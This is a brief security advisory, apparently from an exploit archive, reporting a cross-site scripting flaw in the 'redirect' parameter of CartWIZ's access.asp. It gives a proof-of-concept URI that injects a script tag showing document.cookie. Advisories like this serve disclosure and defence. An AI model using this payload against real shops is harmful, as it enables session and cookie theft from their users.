CartWIZ Access.ASP Cross-Site Scripting Vulnerability

CartWIZ Access.ASP Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/store/access.asp?redirect='"><script>alert(document.cookie)</script>